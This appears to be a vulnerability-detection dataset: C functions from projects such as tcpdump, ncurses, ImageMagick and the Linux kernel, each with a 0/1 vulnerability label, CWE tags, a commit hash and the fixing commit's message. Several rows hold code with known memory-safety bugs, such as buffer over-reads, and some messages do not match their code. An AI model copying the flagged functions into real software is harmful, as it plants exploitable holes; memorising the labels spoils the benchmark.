CVE-2013-6401: Change hash function, randomize hashes Thanks to Florian Weimer and Eric Sesterhenn for reporting, reviewing and testing.
static void tun_cleanup(void) { misc_deregister(&tun_miscdev); rtnl_link_unregister(&tun_link_ops); unregister_netdevice_notifier(&tun_notifier_block); }
0
[ "CWE-476" ]
linux
0ad646c81b2182f7fa67ec0c8c825e0ee165696d
327,405,921,352,101,500,000,000,000,000,000,000,000
6
tun: call dev_get_valid_name() before register_netdevice() register_netdevice() could fail early when we have an invalid dev name, in which case ->ndo_uninit() is not called. For tun device, this is a problem because a timer etc. are already initialized and it expects ->ndo_uninit() to clean them up. We could move these initializations into a ->ndo_init() so that register_netdevice() knows better, however this is still complicated due to the logic in tun_detach(). Therefore, I choose to just call dev_get_valid_name() before register_netdevice(), which is quicker and much easier to audit. And for this specific case, it is already enough. Fixes: 96442e42429e ("tuntap: choose the txq based on rxq") Reported-by: Dmitry Alexeev <[email protected]> Cc: Jason Wang <[email protected]> Cc: "Michael S. Tsirkin" <[email protected]> Signed-off-by: Cong Wang <[email protected]> Signed-off-by: David S. Miller <[email protected]>
alt_merge_opt_exact_info(OptExactInfo* to, OptExactInfo* add, OptEnv* env) { int i, j, len; if (add->len == 0 || to->len == 0) { clear_opt_exact_info(to); return ; } if (! is_equal_mml(&to->mmd, &add->mmd)) { clear_opt_exact_info(to); return ; } for (i = 0; i < to->len && i < add->len; ) { if (to->s[i] != add->s[i]) break; len = enclen(env->enc, to->s + i); for (j = 1; j < len; j++) { if (to->s[i+j] != add->s[i+j]) break; } if (j < len) break; i += len; } if (! add->reach_end || i < add->len || i < to->len) { to->reach_end = 0; } to->len = i; to->ignore_case |= add->ignore_case; alt_merge_opt_anc_info(&to->anc, &add->anc); if (! to->reach_end) to->anc.right_anchor = 0; }
0
[ "CWE-125" ]
php-src
c6e34d91b88638966662caac62c4d0e90538e317
153,517,842,320,210,230,000,000,000,000,000,000,000
34
Fix bug #77371 (heap buffer overflow in mb regex functions - compile_string_node)
chdlc_print(netdissect_options *ndo, register const u_char *p, u_int length) { u_int proto; const u_char *bp = p; if (length < CHDLC_HDRLEN) goto trunc; ND_TCHECK2(*p, CHDLC_HDRLEN); proto = EXTRACT_16BITS(&p[2]); if (ndo->ndo_eflag) { ND_PRINT((ndo, "%s, ethertype %s (0x%04x), length %u: ", tok2str(chdlc_cast_values, "0x%02x", p[0]), tok2str(ethertype_values, "Unknown", proto), proto, length)); } length -= CHDLC_HDRLEN; p += CHDLC_HDRLEN; switch (proto) { case ETHERTYPE_IP: ip_print(ndo, p, length); break; case ETHERTYPE_IPV6: ip6_print(ndo, p, length); break; case CHDLC_TYPE_SLARP: chdlc_slarp_print(ndo, p, length); break; #if 0 case CHDLC_TYPE_CDP: chdlc_cdp_print(p, length); break; #endif case ETHERTYPE_MPLS: case ETHERTYPE_MPLS_MULTI: mpls_print(ndo, p, length); break; case ETHERTYPE_ISO: /* is the fudge byte set ? lets verify by spotting ISO headers */ if (length < 2) goto trunc; ND_TCHECK_16BITS(p); if (*(p+1) == 0x81 || *(p+1) == 0x82 || *(p+1) == 0x83) isoclns_print(ndo, p + 1, length - 1, ndo->ndo_snapend - p - 1); else isoclns_print(ndo, p, length, ndo->ndo_snapend - p); break; default: if (!ndo->ndo_eflag) ND_PRINT((ndo, "unknown CHDLC protocol (0x%04x)", proto)); break; } return (CHDLC_HDRLEN); trunc: ND_PRINT((ndo, "[|chdlc]")); return ndo->ndo_snapend - bp; }
1
[ "CWE-125", "CWE-787" ]
tcpdump
1dcd10aceabbc03bf571ea32b892c522cbe923de
256,938,941,802,968,770,000,000,000,000,000,000,000
63
CVE-2017-12897/ISO CLNS: Use ND_TTEST() for the bounds checks in isoclns_print(). This fixes a buffer over-read discovered by Kamil Frankowicz. Don't pass the remaining caplen - that's too hard to get right, and we were getting it wrong in at least one case; just use ND_TTEST(). Add a test using the capture file supplied by the reporter(s).
static MagickBooleanType WriteVIFFImage(const ImageInfo *image_info, Image *image) { #define VFF_CM_genericRGB 15 #define VFF_CM_NONE 0 #define VFF_DEP_IEEEORDER 0x2 #define VFF_DES_RAW 0 #define VFF_LOC_IMPLICIT 1 #define VFF_MAPTYP_NONE 0 #define VFF_MAPTYP_1_BYTE 1 #define VFF_MS_NONE 0 #define VFF_MS_ONEPERBAND 1 #define VFF_TYP_BIT 0 #define VFF_TYP_1_BYTE 1 typedef struct _ViffInfo { char identifier, file_type, release, version, machine_dependency, reserve[3], comment[512]; size_t rows, columns, subrows; int x_offset, y_offset; unsigned int x_bits_per_pixel, y_bits_per_pixel, location_type, location_dimension, number_of_images, number_data_bands, data_storage_type, data_encode_scheme, map_scheme, map_storage_type, map_rows, map_columns, map_subrows, map_enable, maps_per_cycle, color_space_model; } ViffInfo; const char *value; MagickBooleanType status; MagickOffsetType scene; MagickSizeType number_pixels, packets; MemoryInfo *pixel_info; register const IndexPacket *indexes; register const PixelPacket *p; register ssize_t x; register ssize_t i; register unsigned char *q; size_t imageListLength; ssize_t y; unsigned char *pixels; ViffInfo viff_info; /* Open output image file. */ assert(image_info != (const ImageInfo *) NULL); assert(image_info->signature == MagickCoreSignature); assert(image != (Image *) NULL); assert(image->signature == MagickCoreSignature); if (image->debug != MagickFalse) (void) LogMagickEvent(TraceEvent,GetMagickModule(),"%s",image->filename); status=OpenBlob(image_info,image,WriteBinaryBlobMode,&image->exception); if (status == MagickFalse) return(status); (void) memset(&viff_info,0,sizeof(ViffInfo)); scene=0; imageListLength=GetImageListLength(image); do { /* Initialize VIFF image structure. */ (void) TransformImageColorspace(image,sRGBColorspace); DisableMSCWarning(4310) viff_info.identifier=(char) 0xab; RestoreMSCWarning viff_info.file_type=1; viff_info.release=1; viff_info.version=3; viff_info.machine_dependency=VFF_DEP_IEEEORDER; /* IEEE byte ordering */ *viff_info.comment='\0'; value=GetImageProperty(image,"comment"); if (value != (const char *) NULL) (void) CopyMagickString(viff_info.comment,value,MagickMin(strlen(value), 511)+1); viff_info.rows=image->columns; viff_info.columns=image->rows; viff_info.subrows=0; viff_info.x_offset=(~0); viff_info.y_offset=(~0); viff_info.x_bits_per_pixel=0; viff_info.y_bits_per_pixel=0; viff_info.location_type=VFF_LOC_IMPLICIT; viff_info.location_dimension=0; viff_info.number_of_images=1; viff_info.data_encode_scheme=VFF_DES_RAW; viff_info.map_scheme=VFF_MS_NONE; viff_info.map_storage_type=VFF_MAPTYP_NONE; viff_info.map_rows=0; viff_info.map_columns=0; viff_info.map_subrows=0; viff_info.map_enable=1; /* no colormap */ viff_info.maps_per_cycle=0; number_pixels=(MagickSizeType) image->columns*image->rows; if (image->storage_class == DirectClass) { /* Full color VIFF raster. */ viff_info.number_data_bands=image->matte ? 4U : 3U; viff_info.color_space_model=VFF_CM_genericRGB; viff_info.data_storage_type=VFF_TYP_1_BYTE; packets=viff_info.number_data_bands*number_pixels; } else { viff_info.number_data_bands=1; viff_info.color_space_model=VFF_CM_NONE; viff_info.data_storage_type=VFF_TYP_1_BYTE; packets=number_pixels; if (SetImageGray(image,&image->exception) == MagickFalse) { /* Colormapped VIFF raster. */ viff_info.map_scheme=VFF_MS_ONEPERBAND; viff_info.map_storage_type=VFF_MAPTYP_1_BYTE; viff_info.map_rows=3; viff_info.map_columns=(unsigned int) image->colors; } else if (image->colors <= 2) { /* Monochrome VIFF raster. 
*/ viff_info.data_storage_type=VFF_TYP_BIT; packets=((image->columns+7) >> 3)*image->rows; } } /* Write VIFF image header (pad to 1024 bytes). */ (void) WriteBlob(image,sizeof(viff_info.identifier),(unsigned char *) &viff_info.identifier); (void) WriteBlob(image,sizeof(viff_info.file_type),(unsigned char *) &viff_info.file_type); (void) WriteBlob(image,sizeof(viff_info.release),(unsigned char *) &viff_info.release); (void) WriteBlob(image,sizeof(viff_info.version),(unsigned char *) &viff_info.version); (void) WriteBlob(image,sizeof(viff_info.machine_dependency), (unsigned char *) &viff_info.machine_dependency); (void) WriteBlob(image,sizeof(viff_info.reserve),(unsigned char *) viff_info.reserve); (void) WriteBlob(image,512,(unsigned char *) viff_info.comment); (void) WriteBlobMSBLong(image,(unsigned int) viff_info.rows); (void) WriteBlobMSBLong(image,(unsigned int) viff_info.columns); (void) WriteBlobMSBLong(image,(unsigned int) viff_info.subrows); (void) WriteBlobMSBLong(image,(unsigned int) viff_info.x_offset); (void) WriteBlobMSBLong(image,(unsigned int) viff_info.y_offset); viff_info.x_bits_per_pixel=(unsigned int) ((63 << 24) | (128 << 16)); (void) WriteBlobMSBLong(image,(unsigned int) viff_info.x_bits_per_pixel); viff_info.y_bits_per_pixel=(unsigned int) ((63 << 24) | (128 << 16)); (void) WriteBlobMSBLong(image,(unsigned int) viff_info.y_bits_per_pixel); (void) WriteBlobMSBLong(image,viff_info.location_type); (void) WriteBlobMSBLong(image,viff_info.location_dimension); (void) WriteBlobMSBLong(image,(unsigned int) viff_info.number_of_images); (void) WriteBlobMSBLong(image,(unsigned int) viff_info.number_data_bands); (void) WriteBlobMSBLong(image,(unsigned int) viff_info.data_storage_type); (void) WriteBlobMSBLong(image,(unsigned int) viff_info.data_encode_scheme); (void) WriteBlobMSBLong(image,(unsigned int) viff_info.map_scheme); (void) WriteBlobMSBLong(image,(unsigned int) viff_info.map_storage_type); (void) WriteBlobMSBLong(image,(unsigned int) viff_info.map_rows); (void) WriteBlobMSBLong(image,(unsigned int) viff_info.map_columns); (void) WriteBlobMSBLong(image,(unsigned int) viff_info.map_subrows); (void) WriteBlobMSBLong(image,(unsigned int) viff_info.map_enable); (void) WriteBlobMSBLong(image,(unsigned int) viff_info.maps_per_cycle); (void) WriteBlobMSBLong(image,(unsigned int) viff_info.color_space_model); for (i=0; i < 420; i++) (void) WriteBlobByte(image,'\0'); /* Convert MIFF to VIFF raster pixels. */ pixel_info=AcquireVirtualMemory((size_t) packets,sizeof(*pixels)); if (pixel_info == (MemoryInfo *) NULL) ThrowWriterException(ResourceLimitError,"MemoryAllocationFailed"); pixels=(unsigned char *) GetVirtualMemoryBlob(pixel_info); q=pixels; if (image->storage_class == DirectClass) { /* Convert DirectClass packet to VIFF RGB pixel. 
*/ number_pixels=(MagickSizeType) image->columns*image->rows; for (y=0; y < (ssize_t) image->rows; y++) { p=GetVirtualPixels(image,0,y,image->columns,1,&image->exception); if (p == (const PixelPacket *) NULL) break; for (x=0; x < (ssize_t) image->columns; x++) { *q=ScaleQuantumToChar(GetPixelRed(p)); *(q+number_pixels)=ScaleQuantumToChar(GetPixelGreen(p)); *(q+number_pixels*2)=ScaleQuantumToChar(GetPixelBlue(p)); if (image->matte != MagickFalse) *(q+number_pixels*3)=ScaleQuantumToChar((Quantum) (GetPixelAlpha(p))); p++; q++; } if (image->previous == (Image *) NULL) { status=SetImageProgress(image,SaveImageTag,(MagickOffsetType) y, image->rows); if (status == MagickFalse) break; } } } else if (SetImageGray(image,&image->exception) == MagickFalse) { unsigned char *viff_colormap; /* Dump colormap to file. */ viff_colormap=(unsigned char *) AcquireQuantumMemory(image->colors, 3*sizeof(*viff_colormap)); if (viff_colormap == (unsigned char *) NULL) ThrowWriterException(ResourceLimitError,"MemoryAllocationFailed"); q=viff_colormap; for (i=0; i < (ssize_t) image->colors; i++) *q++=ScaleQuantumToChar(image->colormap[i].red); for (i=0; i < (ssize_t) image->colors; i++) *q++=ScaleQuantumToChar(image->colormap[i].green); for (i=0; i < (ssize_t) image->colors; i++) *q++=ScaleQuantumToChar(image->colormap[i].blue); (void) WriteBlob(image,3*image->colors,viff_colormap); viff_colormap=(unsigned char *) RelinquishMagickMemory(viff_colormap); /* Convert PseudoClass packet to VIFF colormapped pixels. */ q=pixels; for (y=0; y < (ssize_t) image->rows; y++) { p=GetVirtualPixels(image,0,y,image->columns,1,&image->exception); if (p == (const PixelPacket *) NULL) break; indexes=GetVirtualIndexQueue(image); for (x=0; x < (ssize_t) image->columns; x++) *q++=(unsigned char) GetPixelIndex(indexes+x); if (image->previous == (Image *) NULL) { status=SetImageProgress(image,SaveImageTag,(MagickOffsetType) y, image->rows); if (status == MagickFalse) break; } } } else if (image->colors <= 2) { ssize_t x, y; register unsigned char bit, byte; /* Convert PseudoClass image to a VIFF monochrome image. */ for (y=0; y < (ssize_t) image->rows; y++) { p=GetVirtualPixels(image,0,y,image->columns,1,&image->exception); if (p == (const PixelPacket *) NULL) break; indexes=GetVirtualIndexQueue(image); bit=0; byte=0; for (x=0; x < (ssize_t) image->columns; x++) { byte>>=1; if (GetPixelLuma(image,p) < (QuantumRange/2.0)) byte|=0x80; bit++; if (bit == 8) { *q++=byte; bit=0; byte=0; } } if (bit != 0) *q++=byte >> (8-bit); if (image->previous == (Image *) NULL) { status=SetImageProgress(image,SaveImageTag,(MagickOffsetType) y,image->rows); if (status == MagickFalse) break; } } } else { /* Convert PseudoClass packet to VIFF grayscale pixel. */ for (y=0; y < (ssize_t) image->rows; y++) { p=GetVirtualPixels(image,0,y,image->columns,1,&image->exception); if (p == (const PixelPacket *) NULL) break; for (x=0; x < (ssize_t) image->columns; x++) { *q++=(unsigned char) ClampToQuantum(GetPixelLuma(image,p)); p++; } if (image->previous == (Image *) NULL) { status=SetImageProgress(image,SaveImageTag,(MagickOffsetType) y,image->rows); if (status == MagickFalse) break; } } } (void) WriteBlob(image,(size_t) packets,pixels); pixel_info=RelinquishVirtualMemory(pixel_info); if (GetNextImageInList(image) == (Image *) NULL) break; image=SyncNextImageInList(image); status=SetImageProgress(image,SaveImagesTag,scene++,imageListLength); if (status == MagickFalse) break; } while (image_info->adjoin != MagickFalse); (void) CloseBlob(image); return(MagickTrue); }
0
[ "CWE-400" ]
ImageMagick6
d5e7c2b5ba384e7d0d8ddac6c9ae2319cb74b9c5
294,520,202,085,113,500,000,000,000,000,000,000,000
390
https://github.com/ImageMagick/ImageMagick/issues/1286
__generic_file_splice_read(struct file *in, loff_t *ppos, struct pipe_inode_info *pipe, size_t len, unsigned int flags) { struct address_space *mapping = in->f_mapping; unsigned int loff, nr_pages, req_pages; struct page *pages[PIPE_BUFFERS]; struct partial_page partial[PIPE_BUFFERS]; struct page *page; pgoff_t index, end_index; loff_t isize; int error, page_nr; struct splice_pipe_desc spd = { .pages = pages, .partial = partial, .flags = flags, .ops = &page_cache_pipe_buf_ops, }; index = *ppos >> PAGE_CACHE_SHIFT; loff = *ppos & ~PAGE_CACHE_MASK; req_pages = (len + loff + PAGE_CACHE_SIZE - 1) >> PAGE_CACHE_SHIFT; nr_pages = min(req_pages, (unsigned)PIPE_BUFFERS); /* * Lookup the (hopefully) full range of pages we need. */ spd.nr_pages = find_get_pages_contig(mapping, index, nr_pages, pages); index += spd.nr_pages; /* * If find_get_pages_contig() returned fewer pages than we needed, * readahead/allocate the rest and fill in the holes. */ if (spd.nr_pages < nr_pages) page_cache_sync_readahead(mapping, &in->f_ra, in, index, req_pages - spd.nr_pages); error = 0; while (spd.nr_pages < nr_pages) { /* * Page could be there, find_get_pages_contig() breaks on * the first hole. */ page = find_get_page(mapping, index); if (!page) { /* * page didn't exist, allocate one. */ page = page_cache_alloc_cold(mapping); if (!page) break; error = add_to_page_cache_lru(page, mapping, index, GFP_KERNEL); if (unlikely(error)) { page_cache_release(page); if (error == -EEXIST) continue; break; } /* * add_to_page_cache() locks the page, unlock it * to avoid convoluting the logic below even more. */ unlock_page(page); } pages[spd.nr_pages++] = page; index++; } /* * Now loop over the map and see if we need to start IO on any * pages, fill in the partial map, etc. */ index = *ppos >> PAGE_CACHE_SHIFT; nr_pages = spd.nr_pages; spd.nr_pages = 0; for (page_nr = 0; page_nr < nr_pages; page_nr++) { unsigned int this_len; if (!len) break; /* * this_len is the max we'll use from this page */ this_len = min_t(unsigned long, len, PAGE_CACHE_SIZE - loff); page = pages[page_nr]; if (PageReadahead(page)) page_cache_async_readahead(mapping, &in->f_ra, in, page, index, req_pages - page_nr); /* * If the page isn't uptodate, we may need to start io on it */ if (!PageUptodate(page)) { /* * If in nonblock mode then dont block on waiting * for an in-flight io page */ if (flags & SPLICE_F_NONBLOCK) { if (TestSetPageLocked(page)) break; } else lock_page(page); /* * page was truncated, stop here. if this isn't the * first page, we'll just complete what we already * added */ if (!page->mapping) { unlock_page(page); break; } /* * page was already under io and is now done, great */ if (PageUptodate(page)) { unlock_page(page); goto fill_it; } /* * need to read in the page */ error = mapping->a_ops->readpage(in, page); if (unlikely(error)) { /* * We really should re-lookup the page here, * but it complicates things a lot. Instead * lets just do what we already stored, and * we'll get it the next time we are called. */ if (error == AOP_TRUNCATED_PAGE) error = 0; break; } } fill_it: /* * i_size must be checked after PageUptodate. 
*/ isize = i_size_read(mapping->host); end_index = (isize - 1) >> PAGE_CACHE_SHIFT; if (unlikely(!isize || index > end_index)) break; /* * if this is the last page, see if we need to shrink * the length and stop */ if (end_index == index) { unsigned int plen; /* * max good bytes in this page */ plen = ((isize - 1) & ~PAGE_CACHE_MASK) + 1; if (plen <= loff) break; /* * force quit after adding this page */ this_len = min(this_len, plen - loff); len = this_len; } partial[page_nr].offset = loff; partial[page_nr].len = this_len; len -= this_len; loff = 0; spd.nr_pages++; index++; } /* * Release any pages at the end, if we quit early. 'page_nr' is how far * we got, 'nr_pages' is how many pages are in the map. */ while (page_nr < nr_pages) page_cache_release(pages[page_nr++]); in->f_ra.prev_index = index; if (spd.nr_pages) return splice_to_pipe(pipe, &spd); return error; }
0
[ "CWE-399" ]
linux-2.6
6a860c979b35469e4d77da781a96bdb2ca05ae64
121,375,069,238,004,950,000,000,000,000,000,000,000
194
splice: fix bad unlock_page() in error case If add_to_page_cache_lru() fails, the page will not be locked. But splice jumps to an error path that does a page release and unlock, causing a BUG() in unlock_page(). Fix this by adding one more label that just releases the page. This bug was actually triggered on EL5 by gurudas pai <[email protected]> using fio. Signed-off-by: Jens Axboe <[email protected]> Signed-off-by: Linus Torvalds <[email protected]>
static void set_ns_and_type_ex(xmlNodePtr node, char *ns, char *type) { smart_str nstype = {0}; get_type_str(node, ns, type, &nstype); set_xsi_type(node, nstype.c); smart_str_free(&nstype); }
0
[ "CWE-19" ]
php-src
c8eaca013a3922e8383def6158ece2b63f6ec483
81,595,902,128,922,180,000,000,000,000,000,000,000
7
Added type checks
u64 sched_clock_cpu(int cpu) { struct sched_clock_data *scd; u64 clock; if (sched_clock_stable()) return sched_clock(); if (unlikely(!sched_clock_running)) return 0ull; preempt_disable_notrace(); scd = cpu_sdc(cpu); if (cpu != smp_processor_id()) clock = sched_clock_remote(scd); else clock = sched_clock_local(scd); preempt_enable_notrace(); return clock; }
0
[]
linux
96b3d28bf4b00f62fc8386ff5d487d1830793a3d
115,708,631,594,516,850,000,000,000,000,000,000,000
22
sched/clock: Prevent tracing recursion in sched_clock_cpu() Prevent tracing of preempt_disable/enable() in sched_clock_cpu(). When CONFIG_DEBUG_PREEMPT is enabled, preempt_disable/enable() are traced and this causes trace_clock() users (and probably others) to go into an infinite recursion. Systems with a stable sched_clock() are not affected. This problem is similar to that fixed by upstream commit 95ef1e52922 ("KVM guest: prevent tracing recursion with kvmclock"). Signed-off-by: Fernando Luis Vazquez Cao <[email protected]> Signed-off-by: Peter Zijlstra <[email protected]> Acked-by: Steven Rostedt <[email protected]> Cc: Andrew Morton <[email protected]> Cc: Linus Torvalds <[email protected]> Link: http://lkml.kernel.org/r/1394083528.4524.3.camel@nexus Signed-off-by: Ingo Molnar <[email protected]>
static inline int gsi_irq_sharing(int gsi) { return gsi; }
0
[]
linux-2.6
f0f4c3432e5e1087b3a8c0e6bd4113d3c37497ff
198,778,032,469,776,700,000,000,000,000,000,000,000
1
[PATCH] i386: add HPET(s) into resource map Add HPET(s) into resource map. This will allow for the HPET(s) to be visibile within /proc/iomem. Signed-off-by: Aaron Durbin <[email protected]> Signed-off-by: Andi Kleen <[email protected]>
externalEntityInitProcessor3(XML_Parser parser, const char *start, const char *end, const char **endPtr) { int tok; const char *next = start; /* XmlContentTok doesn't always set the last arg */ parser->m_eventPtr = start; tok = XmlContentTok(parser->m_encoding, start, end, &next); parser->m_eventEndPtr = next; switch (tok) { case XML_TOK_XML_DECL: { enum XML_Error result; result = processXmlDecl(parser, 1, start, next); if (result != XML_ERROR_NONE) return result; switch (parser->m_parsingStatus.parsing) { case XML_SUSPENDED: *endPtr = next; return XML_ERROR_NONE; case XML_FINISHED: return XML_ERROR_ABORTED; default: start = next; } } break; case XML_TOK_PARTIAL: if (! parser->m_parsingStatus.finalBuffer) { *endPtr = start; return XML_ERROR_NONE; } return XML_ERROR_UNCLOSED_TOKEN; case XML_TOK_PARTIAL_CHAR: if (! parser->m_parsingStatus.finalBuffer) { *endPtr = start; return XML_ERROR_NONE; } return XML_ERROR_PARTIAL_CHAR; } parser->m_processor = externalEntityContentProcessor; parser->m_tagLevel = 1; return externalEntityContentProcessor(parser, start, end, endPtr); }
0
[ "CWE-611", "CWE-776", "CWE-415", "CWE-125" ]
libexpat
c20b758c332d9a13afbbb276d30db1d183a85d43
39,365,360,408,996,935,000,000,000,000,000,000,000
41
xmlparse.c: Deny internal entities closing the doctype
const Stats& SSL_CTX::GetStats() const { return stats_; }
0
[ "CWE-254" ]
mysql-server
e7061f7e5a96c66cb2e0bf46bec7f6ff35801a69
224,181,026,376,282,600,000,000,000,000,000,000,000
4
Bug #22738607: YASSL FUNCTION X509_NAME_GET_INDEX_BY_NID IS NOT WORKING AS EXPECTED.
static void framebuffer_update_request(VncState *vs, int incremental, int x, int y, int w, int h) { int width = pixman_image_get_width(vs->vd->server); int height = pixman_image_get_height(vs->vd->server); vs->need_update = 1; if (incremental) { return; } vnc_set_area_dirty(vs->dirty, width, height, x, y, w, h); }
0
[ "CWE-125" ]
qemu
bea60dd7679364493a0d7f5b54316c767cf894ef
146,795,160,502,551,310,000,000,000,000,000,000,000
14
ui/vnc: fix potential memory corruption issues this patch makes the VNC server work correctly if the server surface and the guest surface have different sizes. Basically the server surface is adjusted to not exceed VNC_MAX_WIDTH x VNC_MAX_HEIGHT and additionally the width is rounded up to multiple of VNC_DIRTY_PIXELS_PER_BIT. If we have a resolution whose width is not dividable by VNC_DIRTY_PIXELS_PER_BIT we now get a small black bar on the right of the screen. If the surface is too big to fit the limits only the upper left area is shown. On top of that this fixes 2 memory corruption issues: The first was actually discovered during playing around with a Windows 7 vServer. During resolution change in Windows 7 it happens sometimes that Windows changes to an intermediate resolution where server_stride % cmp_bytes != 0 (in vnc_refresh_server_surface). This happens only if width % VNC_DIRTY_PIXELS_PER_BIT != 0. The second is a theoretical issue, but is maybe exploitable by the guest. If for some reason the guest surface size is bigger than VNC_MAX_WIDTH x VNC_MAX_HEIGHT we end up in severe corruption since this limit is nowhere enforced. Signed-off-by: Peter Lieven <[email protected]> Signed-off-by: Gerd Hoffmann <[email protected]>
subscription *GetNextSubscription(service_info *service, subscription *current) { time_t current_time; subscription *next = NULL; subscription *previous = NULL; int notDone = 1; /* get the current_time */ time(&current_time); while (notDone && current) { previous = current; current = current->next; if (!current) { notDone = 0; next = current; } else if (current->expireTime && current->expireTime < current_time) { previous->next = current->next; current->next = NULL; freeSubscriptionList(current); current = previous; service->TotalSubscriptions--; } else if (current->active) { notDone = 0; next = current; } } return next; }
0
[ "CWE-476" ]
pupnp
c805c1de1141cb22f74c0d94dd5664bda37398e0
196,439,850,587,170,250,000,000,000,000,000,000,000
30
Fixes #177: NULL pointer dereference in FindServiceControlURLPath Also fixes its dual bug in FindServiceEventURLPath.
static int generate_one_key(ssh_string k, struct ssh_crypto_struct *crypto, unsigned char **output, char letter, size_t requested_size) { ssh_mac_ctx ctx; unsigned char *tmp; size_t size = crypto->digest_len; ctx=ssh_mac_ctx_init(crypto->mac_type); if (ctx == NULL) { return -1; } ssh_mac_update(ctx, k, ssh_string_len(k) + 4); ssh_mac_update(ctx, crypto->secret_hash, crypto->digest_len); ssh_mac_update(ctx, &letter, 1); ssh_mac_update(ctx, crypto->session_id, crypto->digest_len); ssh_mac_final(*output, ctx); while(requested_size > size) { tmp = realloc(*output, size + crypto->digest_len); if (tmp == NULL) { return -1; } *output = tmp; ctx = ssh_mac_ctx_init(crypto->mac_type); if (ctx == NULL) { return -1; } ssh_mac_update(ctx, k, ssh_string_len(k) + 4); ssh_mac_update(ctx, crypto->secret_hash, crypto->digest_len); ssh_mac_update(ctx, tmp, size); ssh_mac_final(tmp + size, ctx); size += crypto->digest_len; } return 0; }
0
[ "CWE-200" ]
libssh
4e6ff36a9a3aef72aa214f6fb267c28953b80060
254,255,474,785,499,900,000,000,000,000,000,000,000
38
dh: Fix CVE-2016-0739 Due to a byte/bit confusion, the DH secret was too short. This file was completely reworked and will be commited in a future version. Signed-off-by: Aris Adamantiadis <[email protected]> Reviewed-by: Andreas Schneider <[email protected]>
LossyDctDecoder (std::vector<char *> &rowPtrs, char *packedAc, char *packedDc, const unsigned short *toLinear, int width, int height, PixelType type) : LossyDctDecoderBase(packedAc, packedDc, toLinear, width, height) { _rowPtrs.push_back(rowPtrs); _type.push_back(type); }
0
[ "CWE-125" ]
openexr
e79d2296496a50826a15c667bf92bdc5a05518b4
148,083,929,285,795,240,000,000,000,000,000,000,000
14
fix memory leaks and invalid memory accesses Signed-off-by: Peter Hillman <[email protected]>
static int nft_deltable(struct nft_ctx *ctx) { int err; err = nft_trans_table_add(ctx, NFT_MSG_DELTABLE); if (err < 0) return err; nft_deactivate_next(ctx->net, ctx->table); return err; }
0
[ "CWE-665" ]
linux
ad9f151e560b016b6ad3280b48e42fa11e1a5440
31,499,764,981,142,287,000,000,000,000,000,000,000
11
netfilter: nf_tables: initialize set before expression setup nft_set_elem_expr_alloc() needs an initialized set if expression sets on the NFT_EXPR_GC flag. Move set fields initialization before expression setup. [4512935.019450] ================================================================== [4512935.019456] BUG: KASAN: null-ptr-deref in nft_set_elem_expr_alloc+0x84/0xd0 [nf_tables] [4512935.019487] Read of size 8 at addr 0000000000000070 by task nft/23532 [4512935.019494] CPU: 1 PID: 23532 Comm: nft Not tainted 5.12.0-rc4+ #48 [...] [4512935.019502] Call Trace: [4512935.019505] dump_stack+0x89/0xb4 [4512935.019512] ? nft_set_elem_expr_alloc+0x84/0xd0 [nf_tables] [4512935.019536] ? nft_set_elem_expr_alloc+0x84/0xd0 [nf_tables] [4512935.019560] kasan_report.cold.12+0x5f/0xd8 [4512935.019566] ? nft_set_elem_expr_alloc+0x84/0xd0 [nf_tables] [4512935.019590] nft_set_elem_expr_alloc+0x84/0xd0 [nf_tables] [4512935.019615] nf_tables_newset+0xc7f/0x1460 [nf_tables] Reported-by: [email protected] Fixes: 65038428b2c6 ("netfilter: nf_tables: allow to specify stateful expression in set definition") Signed-off-by: Pablo Neira Ayuso <[email protected]>
Filter::streamResetReasonToResponseFlag(Http::StreamResetReason reset_reason) { switch (reset_reason) { case Http::StreamResetReason::ConnectionFailure: return StreamInfo::ResponseFlag::UpstreamConnectionFailure; case Http::StreamResetReason::ConnectionTermination: return StreamInfo::ResponseFlag::UpstreamConnectionTermination; case Http::StreamResetReason::LocalReset: case Http::StreamResetReason::LocalRefusedStreamReset: return StreamInfo::ResponseFlag::LocalReset; case Http::StreamResetReason::Overflow: return StreamInfo::ResponseFlag::UpstreamOverflow; case Http::StreamResetReason::RemoteReset: case Http::StreamResetReason::RemoteRefusedStreamReset: case Http::StreamResetReason::ConnectError: return StreamInfo::ResponseFlag::UpstreamRemoteReset; case Http::StreamResetReason::ProtocolError: return StreamInfo::ResponseFlag::UpstreamProtocolError; case Http::StreamResetReason::OverloadManager: return StreamInfo::ResponseFlag::OverloadManager; } NOT_REACHED_GCOVR_EXCL_LINE; }
0
[ "CWE-703" ]
envoy
f0bb2219112d8cdb4c4e8b346834f962925362ca
147,780,325,852,172,080,000,000,000,000,000,000,000
23
[1.20] CVE-2022-21655 Crash with direct_response Signed-off-by: Otto van der Schaaf <[email protected]>
append_acs0(string_desc * dst, int code, int src) { if (src != 0) { char temp[3]; temp[0] = (char) code; temp[1] = (char) src; temp[2] = 0; _nc_safe_strcat(dst, temp); } }
1
[ "CWE-125" ]
ncurses
b025434573f466efe27862656a6a9d41dd2bd609
295,912,312,282,816,600,000,000,000,000,000,000,000
10
ncurses 6.1 - patch 20191012 + amend recent changes to ncurses*-config and pc-files to filter out Debian linker-flags (report by Sven Joachim, cf: 20150516). + clarify relationship between tic, infocmp and captoinfo in manpage. + check for invalid hashcode in _nc_find_type_entry and _nc_find_name_entry. > fix several errata in tic (reports/testcases by "zjuchenyuan"): + check for invalid hashcode in _nc_find_entry. + check for missing character after backslash in fmt_entry + check for acsc with odd length in dump_entry in check for one-one mapping (cf: 20060415); + check length when converting from old AIX box_chars_1 capability, overlooked in changes to eliminate strcpy (cf: 20001007). + amend the ncurses*-config and pc-files to take into account the rpath
